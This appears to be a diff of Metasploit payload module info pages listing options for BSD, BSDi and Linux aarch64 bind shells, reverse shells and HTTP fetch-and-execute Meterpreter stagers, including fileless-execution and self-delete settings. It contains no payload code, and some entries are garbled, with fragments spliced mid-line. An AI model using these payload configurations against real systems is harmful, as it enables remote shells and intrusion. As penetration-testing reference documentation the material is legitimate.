PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,40 +0,0 @@
Name: BSD Command Shell, Bind TCP Inline (IPv6)
Module: payload/bsd/x86/shell_bind_tcp_ipv6
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 87
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,37 +0,0 @@
Name: BSD Command Shell, Find Port Inline
Module: payload/bsd/x86/shell_find_port
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 60
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CPORT 35777 no The local client port
Description:
Spawn a shell on an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,33 +0,0 @@
Name: BSD Command Shell, Find Tag Inline
Module: payload/bsd/x86/shell_find_tag
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 70
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Description:
Spawn a shell on an established connection (proxy/NAT safe)
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
TAG T2v6 yes The four byte tag to signify the connection.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,45 +0,0 @@
Name: BSD Command Shell, Reverse TCP Inline
Module: payload/bsd/x86/shell_reverse_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 64
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,48 +0,0 @@
Name: BSD Command Shell, Reverse TCP Inline (IPv6)
Module: payload/bsd/x86/shell_reverse_tcp_ipv6
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 96
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SCOPEID 0 no IPv6 scope ID, for link-local addresses
Description:
Connect back to attacker and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,43 +0,0 @@
Name: BSDi Command Shell, Bind TCP Stager
Module: payload/bsdi/x86/shell/bind_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 69
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Spawn a command shell (staged).
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,50 +0,0 @@
Name: BSDi Command Shell, Reverse TCP Stager
Module: payload/bsdi/x86/shell/reverse_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 59
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,32 +0,0 @@
Name: BSDi Command Shell, Bind TCP Inline
Module: payload/bsdi/x86/shell_bind_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 90
Rank: Normal
Provided by:
skape <mmiller@hick.org>
optyx <optyx@no$email.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,31 +0,0 @@
Name: BSDi Command Shell, Find Port Inline
Module: payload/bsdi/x86/shell_find_port
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 77
Rank: Normal
Provided by:
skape <mmiller@hick.org>
optyx <optyx@no$email.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CPORT 37232 no The local client port
Description:
Spawn a shell on an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,39 +0,0 @@
Name: BSDi Command Shell, Reverse TCP Inline
Module: payload/bsdi/x86/shell_reverse_tcp
Platform: BSDi
Arch: x86
Needs Admin: No
Total size: 77
Rank: Normal
Provided by:
skape <mmiller@hick.org>
optyx <optyx@no$email.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,100 +0,0 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Norma
Evasion options for payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp:
=========================
ic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME fGKaZjGk no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,104 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_http:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME QJpbzCbQetk no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,106 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Br
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_https:
=========================
apid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME htteRZaNp no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,97 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME IHvjSdBvJzEf no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
